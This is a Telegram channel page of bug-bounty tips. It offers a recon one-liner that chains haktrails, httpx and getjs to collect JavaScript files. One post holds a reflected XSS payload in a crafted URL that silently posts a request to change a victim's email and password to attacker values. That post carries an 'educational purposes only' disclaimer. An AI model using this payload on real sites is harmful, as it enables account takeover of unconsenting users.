fa
Feedback
Bug bounty Tips

Bug bounty Tips

رفتن به کانال در Telegram

🛡️ Cybersecurity enthusiast | 💻 Helping secure the digital world | 🌐 Web App Tester | 🕵️‍♂️ OSINT Specialist Admin: @laazy_hack3r

نمایش بیشتر
5 860
مشترکین
+624 ساعت
+707 روز
+36030 روز
آرشیو پست ها
To extract JavaScript files using a one-liner with the following tools: haktrails, httpx, getjs, anew, and tojson, you can use the following command: haktrails -d example.com | httpx -silent | getjs -c 200 - | anew -q jsfiles.txt | tojson Here's what this one-liner does step by step: haktrails -d example.com: Uses haktrails to discover subdomains of example.com. httpx -silent: Uses httpx to fetch the live subdomains and websites associated with example.com. getjs -c 200 -: Uses getjs to extract JavaScript files from the discovered websites. The -c 200 flag specifies a concurrency level of 200 for faster scanning, and the hyphen (-) reads input from the previous command. anew -q jsfiles.txt: Uses anew to filter out duplicate JavaScript file URLs and stores them in a file called jsfiles.txt. tojson: Converts the list of JavaScript URLs into JSON format.

Reflective XSS attack that can be used to bypass CSRF (Cross-Site Request Forgery) protection and potentially lead to an account takeover: ```html <!-- Assume the target website has a Reflective XSS vulnerability --> <!-- The attacker crafts a malicious URL --> https://vulnerable-website.com/profile?user=<script> // Perform CSRF attack to change account email and password var xhr = new XMLHttpRequest(); xhr.open('POST', 'https://vulnerable-website.com/change-email-and-password', true); xhr.setRequestHeader('Content-Type', 'application/x-www-form-urlencoded'); xhr.withCredentials = true; xhr.onreadystatechange = function () { if (xhr.readyState === 4 && xhr.status === 200) { // Account takeover is complete } }; var params = 'email=attacker@email.com&password=newpassword'; xhr.send(params); </script> ``` In this example: 1. The attacker identifies a Reflective XSS vulnerability on the target website. 2. The attacker crafts a URL that includes a malicious script. 3. When a victim clicks on the crafted URL, the script is executed within the context of the victim's session on the target website. 4. The script initiates a CSRF attack by making an XMLHttpRequest to change the victim's account email and password to the attacker's values. Please note that this example is for educational purposes only. Performing Reflective XSS attacks, CSRF attacks, or any unauthorized actions on websites is illegal and unethical. Always ensure you have permission before conducting security testing. Beware.

| ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄| | Let's hack & | | grow together! | |________| \ (•◡•) / \ / —— | | |_ |_

Check out this vulnerability cve on WordPress and it's poc👍
Check out this vulnerability cve on WordPress and it's poc👍

check out this collection of resources on subdomain takeovers [ https://book.cipherops.tech/bug-bounty-notes/web-application/mastering-subdomain-takeovers ]

i have updated few things on the art of xss exploitation u guys can check

photo content

photo content

A BugBounty tip by @bsysop #bugbountytips
+2
A BugBounty tip by @bsysop #bugbountytips

Sorry for not updating any, going through some work i will be updating things very soon.

Pic of the day
Pic of the day

1.5k*

Hey, reaching 15k reach on my bug bounty notes and hoping to have a better reach in future
Hey, reaching 15k reach on my bug bounty notes and hoping to have a better reach in future